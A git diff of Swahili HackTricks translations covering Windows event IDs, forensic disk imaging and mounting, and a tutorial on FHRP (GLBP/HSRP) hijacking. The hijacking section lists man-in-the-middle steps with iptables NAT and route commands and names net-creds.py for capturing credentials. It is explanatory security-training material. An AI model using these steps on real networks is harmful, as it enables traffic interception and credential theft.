Tukio la ID ya 6005 linaashiria kuanza kwa mfumo, wakati Tukio la ID ya 6006 linamaanisha kuzima.
|
||||
Tukio la 6005 linaashiria kuanza kwa mfumo, wakati Tukio la 6006 linamaanisha kuzimwa.
|
||||
|
||||
#### Kufuta Kumbukumbu
|
||||
|
||||
Tukio la Usalama la ID ya 1102 linasema kufutwa kwa kumbukumbu, tukio muhimu kwa uchambuzi wa kisayansi.
|
||||
Usalama wa Tukio la 1102 unamaanisha kufutwa kwa kumbukumbu, tukio muhimu kwa uchambuzi wa kiforensiki.
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
|
||||
</details>
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
|
|
@ -1,18 +1,22 @@
|
|||
# Kupata Picha na Kuimount
|
||||
# Upatikanaji na Kufunga Picha
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, ungependa kuona **kampuni yako ikionekana katika HackTricks**? Au ungependa kupata ufikiaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, ungependa kuona **kampuni yako ikionekana kwenye HackTricks**? au ungependa kupata upatikanaji wa **toleo jipya la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **nifuatilie** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye [repo ya hacktricks](https://github.com/carlospolop/hacktricks) na [repo ya hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwenye [repo ya hacktricks](https://github.com/carlospolop/hacktricks) na [repo ya hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
|
||||
</details>
|
||||
|
||||
## Kupata
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
## Upatikanaji
|
||||
|
||||
### DD
|
||||
```bash
|
||||
|
@ -20,8 +24,6 @@
|
|||
dd if=/dev/sdb of=disk.img
|
||||
```
|
||||
### dcfldd
|
||||
|
||||
dcfldd ni chombo cha kufanya nakala ya picha ya disk. Inafanya kazi sawa na dd, lakini inaongeza baadhi ya vipengele vya ziada kama vile uwezo wa kufuatilia maendeleo ya nakala na kuhakikisha usahihi wa data iliyohamishwa. Chombo hiki kinaweza kutumiwa kwa uchunguzi wa kisayansi wa kisheria na kwa kazi zingine za kufufua data.
|
||||
```bash
|
||||
#Raw copy with hashes along the way (more secur as it checks hashes while it's copying the data)
|
||||
dcfldd if=<subject device> of=<image file> bs=512 hash=<algorithm> hashwindow=<chunk size> hashlog=<hash file>
|
||||
|
@ -29,13 +31,13 @@ dcfldd if=/dev/sdc of=/media/usb/pc.image hash=sha256 hashwindow=1M hashlog=/med
|
|||
```
|
||||
### FTK Imager
|
||||
|
||||
Unaweza [**kupakua FTK imager hapa**](https://accessdata.com/product-download/debian-and-ubuntu-x64-3-1-1).
|
||||
Unaweza [**kupakua FTK imager kutoka hapa**](https://accessdata.com/product-download/debian-and-ubuntu-x64-3-1-1).
|
||||
```bash
|
||||
ftkimager /dev/sdb evidence --e01 --case-number 1 --evidence-number 1 --description 'A description' --examiner 'Your name'
|
||||
```
|
||||
### EWF
|
||||
|
||||
Unaweza kuzalisha picha ya diski kwa kutumia [**zana za ewf**](https://github.com/libyal/libewf).
|
||||
Unaweza kuzalisha picha ya diski ukitumia [**zana za ewf**](https://github.com/libyal/libewf).
|
||||
```bash
|
||||
ewfacquire /dev/sdb
|
||||
#Name: evidence
|
||||
|
@ -52,13 +54,11 @@ ewfacquire /dev/sdb
|
|||
#Then use default values
|
||||
#It will generate the disk image in the current directory
|
||||
```
|
||||
## Weka
|
||||
## Kufunga
|
||||
|
||||
### Aina kadhaa
|
||||
|
||||
Katika **Windows** unaweza kujaribu kutumia toleo la bure la Arsenal Image Mounter ([https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/)) kuweka **picha ya uchunguzi**.
|
||||
|
||||
### Raw
|
||||
Katika **Windows** unaweza kujaribu kutumia toleo huru la Arsenal Image Mounter ([https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/)) kufunga **picha ya uchunguzi wa kielelezo**.
|
||||
```bash
|
||||
#Get file type
|
||||
file evidence.img
|
||||
|
@ -69,17 +69,7 @@ mount evidence.img /mnt
|
|||
```
|
||||
### EWF
|
||||
|
||||
EWF (Expert Witness Format) ni muundo wa faili unaotumiwa kuhifadhi nakala za picha za kumbukumbu za tarakilishi. Nakala hizi za picha zinaweza kutumiwa kwa uchunguzi wa kisheria na kufanya uchambuzi wa data. EWF inaruhusu kuhifadhi picha za kumbukumbu za tarakilishi kwa njia ambayo inahakikisha usalama na ukamilifu wa data.
|
||||
|
||||
Kuna njia mbili za kufanya picha ya kumbukumbu ya tarakilishi kwa kutumia EWF:
|
||||
|
||||
1. **Picha ya kumbukumbu ya kimwili**: Hii inahusisha kufanya nakala ya kumbukumbu ya tarakilishi nzima, pamoja na mfumo wa faili na data yote iliyohifadhiwa. Hii inaweza kufanywa kwa kutumia zana kama `dcfldd` au `dd`.
|
||||
|
||||
2. **Picha ya kumbukumbu ya mantiki**: Hii inahusisha kufanya nakala ya sehemu maalum ya kumbukumbu ya tarakilishi, kama vile mfumo wa faili au folda maalum. Hii inaweza kufanywa kwa kutumia zana kama `ewfacquire` au `FTK Imager`.
|
||||
|
||||
Baada ya kufanya picha ya kumbukumbu, unaweza kuiweka kwenye kifaa cha uhifadhi, kama vile diski ngumu au kifaa cha USB, ili kuifanya iweze kufikiwa kwa uchambuzi zaidi. Pia, unaweza kuiweka kwenye seva ya uhifadhi au kwenye wingu kwa usalama zaidi.
|
||||
|
||||
Kumbuka kuwa wakati wa kufanya picha ya kumbukumbu, ni muhimu kuhakikisha kuwa unafuata miongozo ya kisheria na kufuata taratibu sahihi za kuchukua na kuhifadhi ushahidi wa kielektroniki.
|
||||
### EWF
|
||||
```bash
|
||||
#Get file type
|
||||
file evidence.E01
|
||||
|
@ -96,12 +86,12 @@ mount output/ewf1 -o ro,norecovery /mnt
|
|||
```
|
||||
### ArsenalImageMounter
|
||||
|
||||
Ni Programu ya Windows ya kufunga sehemu. Unaweza kuipakua hapa [https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/)
|
||||
Ni Programu ya Windows ya kupakia voli. Unaweza kuipakua hapa [https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/)
|
||||
|
||||
### Makosa
|
||||
|
||||
* **`hawezi kufunga /dev/loop0 kwa kusoma tu`** katika kesi hii unahitaji kutumia bendera **`-o ro,norecovery`**
|
||||
* **`aina mbaya ya fs, chaguo mbaya, superblock mbaya kwenye /dev/loop0, ukurasa wa msimbo uliopotea au programu msaidizi, au kosa lingine.`** katika kesi hii kufunga kumeshindwa kwa sababu offset ya mfumo wa faili ni tofauti na ile ya picha ya diski. Unahitaji kupata ukubwa wa Sekta na Sekta ya Kuanza:
|
||||
* **`hawezi kupakia /dev/loop0 kusoma tu`** katika kesi hii unahitaji kutumia bendera **`-o ro,norecovery`**
|
||||
* **`aina isiyo sahihi ya fs, chaguo baya, superblock mbaya kwenye /dev/loop0, ukurasa wa nambari uliopotea au programu msaidizi, au kosa lingine.`** katika kesi hii upakiaji ulishindwa kwa sababu offset ya mfumo wa faili ni tofauti na ile ya picha ya diski. Unahitaji kupata Ukubwa wa Sekta na Sekta ya Kuanza:
|
||||
```bash
|
||||
fdisk -l disk.img
|
||||
Disk disk.img: 102 MiB, 106954648 bytes, 208896 sectors
|
||||
|
@ -114,18 +104,22 @@ Disk identifier: 0x00495395
|
|||
Device Boot Start End Sectors Size Id Type
|
||||
disk.img1 2048 208895 206848 101M 1 FAT12
|
||||
```
|
||||
Tafadhali kumbuka kuwa ukubwa wa sehemu ni **512** na kuanza ni **2048**. Kisha funga picha kama ifuatavyo:
|
||||
Tafadhali kumbuka ukubwa wa sekta ni **512** na kuanza ni **2048**. Kisha funga picha kama hivi:
|
||||
```bash
|
||||
mount disk.img /mnt -o ro,offset=$((2048*512))
|
||||
```
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, ungependa kuona **kampuni yako ikionekana katika HackTricks**? Au ungependa kupata ufikiaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa muundo wa PDF**? Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **nifuatilie** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye [repo ya hacktricks](https://github.com/carlospolop/hacktricks) na [repo ya hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, unataka kuona **kampuni yako ikionekana kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwenye [repo ya hacktricks](https://github.com/carlospolop/hacktricks) na [repo ya hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,59 +2,63 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalamu wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
## Maelezo ya Udukuzi wa FHRP
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
### Ufahamu kuhusu FHRP
|
||||
FHRP imeundwa kutoa nguvu kwenye mtandao kwa kuunganisha rutuba nyingi kuwa kitengo kimoja cha kubuni, hivyo kuongeza usambazaji wa mzigo na uvumilivu wa hitilafu. Cisco Systems iliingiza itifaki maarufu katika seti hii, kama vile GLBP na HSRP.
|
||||
|
||||
### Ufahamu wa Itifaki ya GLBP
|
||||
GLBP, ambayo ni ubunifu wa Cisco, inafanya kazi kwenye safu ya TCP/IP, ikitumia UDP kwenye bandari 3222 kwa mawasiliano. Routers katika kikundi cha GLBP hubadilishana pakiti za "hello" kila baada ya sekunde 3. Ikiwa router haiwezi kutuma pakiti hizi kwa sekunde 10, inachukuliwa kuwa haipo. Walakini, timers hizi sio za kudumu na zinaweza kubadilishwa.
|
||||
## Maelezo ya Utekelezaji wa FHRP Hijacking
|
||||
|
||||
### Mbinu za FHRP
|
||||
FHRP imeundwa kutoa nguvu ya mtandao kwa kuunganisha mitambo mingi ya router katika kitengo kimoja cha kubadilishana, hivyo kuboresha usambazaji wa mzigo na uvumilivu wa hitilafu. Cisco Systems iliingiza itifaki maarufu katika mfululizo huu, kama vile GLBP na HSRP.
|
||||
|
||||
### Mbinu za Itifaki ya GLBP
|
||||
Uumbaji wa Cisco, GLBP, hufanya kazi kwenye safu ya TCP/IP, ikichukua UDP kwenye bandari 3222 kwa mawasiliano. Routers katika kikundi cha GLBP hubadilishana pakiti za "hello" kila baada ya sekunde 3. Ikiwa router haitumi pakiti hizi kwa sekunde 10, inadhaniwa kuwa haipo. Walakini, muda huu si wa kudumu na unaweza kurekebishwa.
|
||||
|
||||
### Uendeshaji wa GLBP na Usambazaji wa Mzigo
|
||||
GLBP inajitokeza kwa kuwezesha usambazaji wa mzigo kati ya routers kwa kutumia anwani moja ya IP ya kubuni na anwani nyingi za MAC za kubuni. Katika kikundi cha GLBP, kila router inashiriki katika kusambaza pakiti. Tofauti na HSRP/VRRP, GLBP inatoa usawa wa mzigo halisi kupitia njia kadhaa:
|
||||
GLBP inajitokeza kwa kuwezesha usambazaji wa mzigo kati ya routers kwa kutumia anwani moja ya IP ya kubadilishana pamoja na anwani nyingi za MAC za kubadilishana. Katika kikundi cha GLBP, kila router inashiriki katika kusonga pakiti. Tofauti na HSRP/VRRP, GLBP hutoa usambazaji wa mzigo wa kweli kupitia njia kadhaa:
|
||||
|
||||
- **Usawa wa Mzigo Unaotegemea Mwenyeji:** Inaendeleza ugawaji wa anwani ya MAC ya AVF kwa mwenyeji, muhimu kwa usanidi thabiti wa NAT.
|
||||
- **Usawa wa Mzigo wa Raundi-Robin:** Njia ya msingi, inabadilisha ugawaji wa anwani ya MAC ya AVF kati ya wenyewe wanaohitaji.
|
||||
- **Usawa wa Mzigo wa Raundi-Robin Uliopimwa:** Inasambaza mzigo kulingana na metriki za "Uzito" zilizopangwa mapema.
|
||||
- **Usambazaji wa Mzigo Unaotegemea Mwenyeji:** Unahifadhi ugawaji wa anwani ya MAC ya AVF kwa mwenyeji, muhimu kwa mazingira thabiti ya NAT.
|
||||
- **Usambazaji wa Mzigo wa Round-Robin:** Njia ya msingi, kubadilisha ugawaji wa anwani ya MAC ya AVF kati ya wanaomba mwenyeji.
|
||||
- **Usambazaji wa Mzigo wa Round-Robin Uliopimwa:** Unagawa mzigo kulingana na vipimo vilivyowekwa vya "Uzito".
|
||||
|
||||
### Vipengele na Istilahi muhimu katika GLBP
|
||||
- **AVG (Lango la Kivinjari cha Kazi):** Router kuu, inayowajibika kwa kugawa anwani za MAC kwa routers wenzake.
|
||||
- **AVF (Mbeba Mbele wa Kivinjari cha Kazi):** Router iliyoteuliwa kusimamia trafiki ya mtandao.
|
||||
- **Kipaumbele cha GLBP:** Metriki inayodetermini AVG, ikitoka kwa chaguo-msingi ya 100 na kati ya 1 na 255.
|
||||
- **Uzito wa GLBP:** Inaonyesha mzigo wa sasa kwenye router, inayoweza kurekebishwa kwa mkono au kupitia Ufuatiliaji wa Vitu.
|
||||
- **Anwani ya IP ya Kivinjari cha Kazi cha GLBP:** Inatumika kama lango la chaguo-msingi la mtandao kwa vifaa vyote vilivyounganishwa.
|
||||
- **AVG (Lango la Kielelezo cha Kazi):** Router kuu, inayowajibika kwa kugawa anwani za MAC kwa routers wenzake.
|
||||
- **AVF (Mbeba Mbele wa Kielelezo cha Kazi):** Router iliyoteuliwa kusimamia trafiki ya mtandao.
|
||||
- **Kipaumbele cha GLBP:** Kipimo kinachodhibiti AVG, kuanzia 100 kwa chaguo-msingi na kati ya 1 na 255.
|
||||
- **Uzito wa GLBP:** Inaonyesha mzigo wa sasa kwenye router, inayoweza kurekebishwa kwa mikono au kupitia Ufuatiliaji wa Vitu.
|
||||
- **Anwani ya IP ya Kielelezo cha GLBP:** Inatumika kama lango la kawaida la mtandao kwa vifaa vyote vilivyounganishwa.
|
||||
|
||||
Kwa mwingiliano, GLBP inatumia anwani ya multicast iliyohifadhiwa 224.0.0.102 na bandari ya UDP 3222. Routers hutoa pakiti za "hello" kila baada ya sekunde 3, na huchukuliwa kuwa hazifanyi kazi ikiwa pakiti inakosekana kwa kipindi cha sekunde 10.
|
||||
Kwa mwingiliano, GLBP hutumia anwani ya multicast iliyohifadhiwa 224.0.0.102 na bandari ya UDP 3222. Routers hutuma pakiti za "hello" kila baada ya sekunde 3, na huchukuliwa kutokuwa na uendeshaji ikiwa pakiti inakosekana kwa kipindi cha sekunde 10.
|
||||
|
||||
### Mbinu ya Mashambulizi ya GLBP
|
||||
Mshambuliaji anaweza kuwa router kuu kwa kutuma pakiti ya GLBP na thamani ya kipaumbele iliyo juu kabisa (255). Hii inaweza kusababisha mashambulizi ya DoS au MITM, kuruhusu kuvizia au kuelekeza trafiki.
|
||||
Mshambuliaji anaweza kuwa router kuu kwa kutuma pakiti ya GLBP yenye thamani kubwa ya kipaumbele (255). Hii inaweza kusababisha mashambulizi ya DoS au MITM, kuruhusu kudaka au kuelekeza trafiki.
|
||||
|
||||
### Kutekeleza Mashambulizi ya GLBP na Loki
|
||||
[Loki](https://github.com/raizo62/loki_on_kali) inaweza kutekeleza mashambulizi ya GLBP kwa kuingiza pakiti na kipaumbele na uzito uliowekwa kuwa 255. Hatua za kabla ya mashambulizi zinahusisha kukusanya habari kama vile anwani ya IP ya kubuni, uwepo wa uwakiki, na thamani za kipaumbele za router kwa kutumia zana kama Wireshark.
|
||||
[Loki](https://github.com/raizo62/loki_on_kali) inaweza kutekeleza mashambulizi ya GLBP kwa kuingiza pakiti na kipaumbele na uzito uliowekwa kwa 255. Hatua za kabla ya mashambulizi ni pamoja na kukusanya habari kama vile anwani ya IP ya kubadilishana, uwepo wa uwakilishi, na thamani za kipaumbele za router kwa kutumia zana kama Wireshark.
|
||||
|
||||
Hatua za Mashambulizi:
|
||||
1. Badilisha kwa hali ya promiscuous na wezesha IP forwarding.
|
||||
2. Tambua router lengwa na pata anwani yake ya IP.
|
||||
3. Jenga Gratuitous ARP.
|
||||
1. Badilisha kwa hali ya kusikiliza na wezesha kusonga IP.
|
||||
2. Tambua router lengwa na upate anwani yake ya IP.
|
||||
3. Zalisha ARP ya bure.
|
||||
4. Ingiza pakiti ya GLBP yenye nia mbaya, ukiiga AVG.
|
||||
5. Weka anwani ya IP ya pili kwenye kiolesura cha mtandao cha mshambuliaji, ikifanana na anwani ya IP ya kubuni ya GLBP.
|
||||
5. Tenga anwani ya IP ya pili kwa kiolesura cha mtandao cha mshambuliaji, ikilinganisha na anwani ya IP ya kubadilishana ya GLBP.
|
||||
6. Tekeleza SNAT kwa uonekano kamili wa trafiki.
|
||||
7. Badilisha njia ya kuendelea kuhakikisha upatikanaji wa mtandao kupitia router ya AVG ya asili.
|
||||
7. Badilisha mwelekeo ili kuhakikisha upatikanaji wa mtandao unaendelea kupitia router ya asili ya AVG.
|
||||
|
||||
Kwa kufuata hatua hizi, mshambuliaji anajipanga kama "mtu katikati," anayeweza kuvizia na kuchambua trafiki ya mtandao, ikiwa ni pamoja na data isiyosimbwa au nyeti.
|
||||
Kwa kufuata hatua hizi, mshambuliaji anajitokeza kama "mtu katikati," mwenye uwezo wa kudaka na kuchambua trafiki ya mtandao, ikiwa ni pamoja na data isiyo na usimbaji au nyeti.
|
||||
|
||||
Kwa mfano, hapa kuna vipande vya amri vinavyohitajika:
|
||||
```bash
|
||||
|
@ -70,32 +74,32 @@ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
|
|||
sudo route del default
|
||||
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100
|
||||
```
|
||||
Ufuatiliaji na kuvamia trafiki unaweza kufanywa kwa kutumia net-creds.py au zana kama hizo kwa kukamata na kuchambua data inayopita kupitia mtandao ulioathiriwa.
|
||||
Kufuatilia na kuingilia kati trafiki inaweza kufanywa kwa kutumia net-creds.py au zana kama hizo kuchukua na kuchambua data inayopita kupitia mtandao uliokumbwa.
|
||||
|
||||
### Maelezo ya Kupita kwa HSRP Hijacking na Maelezo ya Amri
|
||||
### Maelezo ya Kusubiri ya Utekaji wa HSRP na Maelezo ya Amri
|
||||
|
||||
#### Muhtasari wa HSRP (Hot Standby Router/Redundancy Protocol)
|
||||
HSRP ni itifaki ya kipekee ya Cisco iliyoundwa kwa ajili ya redundansi ya lango la mtandao. Inaruhusu usanidi wa rutuba nyingi za kimwili kuwa kifaa kimoja mantiki chenye anwani ya IP iliyoshirikiwa. Kifaa hiki mantiki kinasimamiwa na rutuba ya kwanza inayohusika na usimamizi wa trafiki. Tofauti na GLBP, ambayo hutumia vipimo kama kipaumbele na uzito kwa usawa wa mzigo, HSRP inategemea rutuba moja tu inayofanya kazi kama msimamizi wa trafiki.
|
||||
#### Maelezo ya Jumla ya Utekaji wa HSRP (Itikadi ya Msimamo wa Haraka wa Router/Itifaki ya Redundancy)
|
||||
HSRP ni itifaki ya Cisco iliyoundwa kwa ajili ya redundansi ya lango la mtandao. Inaruhusu usanidi wa rutuba za mwili nyingi katika kitengo kimoja la mantiki lenye anwani ya IP iliyoshirikiwa. Kitengo hili la mantiki linasimamiwa na router ya msingi inayowajibika kwa kuelekeza trafiki. Tofauti na GLBP, ambayo hutumia vipimo kama kipaumbele na uzito kwa usawa wa mzigo, HSRP inategemea router moja tu ya aktivi kwa usimamizi wa trafiki.
|
||||
|
||||
#### Majukumu na Istilahi katika HSRP
|
||||
- **Rutuba ya HSRP**: Kifaa kinachofanya kazi kama lango, kusimamia mtiririko wa trafiki.
|
||||
- **Rutuba ya HSRP ya HSRP**: Rutuba ya akiba, tayari kuchukua nafasi ikiwa rutuba ya kwanza itashindwa.
|
||||
- **Kikundi cha HSRP**: Seti ya rutuba zinazoshirikiana kuunda rutuba ya kawaida ya kawaida.
|
||||
- **Anwani ya MAC ya HSRP**: Anwani ya MAC ya kubuni iliyopewa rutuba mantiki katika usanidi wa HSRP.
|
||||
- **Anwani ya IP ya HSRP ya HSRP**: Anwani ya IP ya kawaida ya kikundi cha HSRP, inayofanya kazi kama lango la chaguo-msingi kwa vifaa vilivyounganishwa.
|
||||
- **Router ya Aktivi ya HSRP**: Kifaa kinachofanya kazi kama lango, kusimamia mtiririko wa trafiki.
|
||||
- **Router ya Kusubiri ya HSRP**: Router ya akiba, tayari kuchukua nafasi ikiwa router ya aktivi inashindwa.
|
||||
- **Kikundi cha HSRP**: Seti ya rutuba zinazoshirikiana ili kuunda router ya kubadilika moja.
|
||||
- **Anwani ya MAC ya HSRP**: Anwani ya MAC ya kubadilika iliyoandaliwa kwa router ya mantiki katika usanidi wa HSRP.
|
||||
- **Anwani ya IP ya Kibadilika ya HSRP**: Anwani ya IP ya kibadilika ya kikundi cha HSRP, ikifanya kazi kama lango la msingi kwa vifaa vilivyounganishwa.
|
||||
|
||||
#### Toleo la HSRP
|
||||
HSRP inakuja katika toleo mbili, HSRPv1 na HSRPv2, tofauti kuu ikiwa ni uwezo wa kikundi, matumizi ya IP ya multicast, na muundo wa anwani ya MAC ya kubuni. Itifaki hutumia anwani maalum ya IP ya multicast kwa kubadilishana habari ya huduma, na pakiti za Hello zinatumwa kila baada ya sekunde 3. Rutuba inachukuliwa kuwa haifanyi kazi ikiwa hakuna pakiti inayopokelewa ndani ya kipindi cha sekunde 10.
|
||||
#### Toleo za HSRP
|
||||
